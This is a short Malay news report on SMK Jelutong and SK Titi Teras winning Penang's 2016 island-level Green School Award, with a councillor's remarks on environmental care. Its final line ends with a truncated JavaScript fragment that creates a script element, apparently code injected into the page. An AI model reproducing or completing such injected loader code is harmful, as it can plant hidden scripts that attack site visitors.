SMK Jelutong & SK Titi Teras juara Anugerah Sekolah Hijau peringkat pulau

Teks & Gambar : AHMAD ADIL MUHAMAD

GEORGE TOWN – Sekolah Menengah Kebangsaan (SMK) Jelutong dan Sekolah Kebangsaan (SK) Titi Teras masing-masing dinobatkan gelaran johan keseluruhan bagi kategori masing-masing pada pertandingan Anugerah Sekolah Hijau 2016 Peringkat Pulau di sini baru-baru ini.

Kemenangan berkenaan membolehkan SMK Jelutong yang menjuarai Kategori Sekolah Menengah dan SK Titi Teras (Kategori Sekolah Rendah) masing-masing membawa pulang hadiah wang tunai bernilai RM2,200, piala, sijil penyertaan dan komputer riba tajaan sebuah syarikat pembuatan unit pemprosesan pusat terkemuka, Intel.

Exco Kerajaan Tempatan, Pengurusan Lalulintas dan Tebatan Banjir, Chow Kon Yeow berkata, melalui penganjuran program seumpamanya di peringkat sekolah, secara tidak langsung tahap kesedaran terhadap penjagaan alam sekitar dapat dipupuk dalam kalangan generasi muda masa kini.

“Program ini merupakan satu usaha murni ke arah menjaga kelestarian dan kehijauan alam sekitar.

“Bumi ini tidak diwarisi daripada nenek moyang kita, sebaliknya kita hanya meminjamnya daripada anak cucu kita. Oleh demikian, kesedaran menjaga alam sekitar harus dipupuk dari muda kerana anak-anak inilah yang akan mewarisi alam ini,” katanya pada Majlis Penyampaian Hadiah Anugerah Sekolah Hijau 2016 Peringkat Pulau di sini baru-baru ini.

Datuk Bandar Majlis Bandaraya Pulau Pinang (MBPP), Dato’ Patahiyah Ismail, Thing Siew Shuen (Pengurus Besar Penang Green Council, PGC), Ahli-ahli Majlis MBPP dan wakil-wakil pihak penaja turut hadir pada majlis berkaitan.var d=document;var s=d.createElement(‘script’);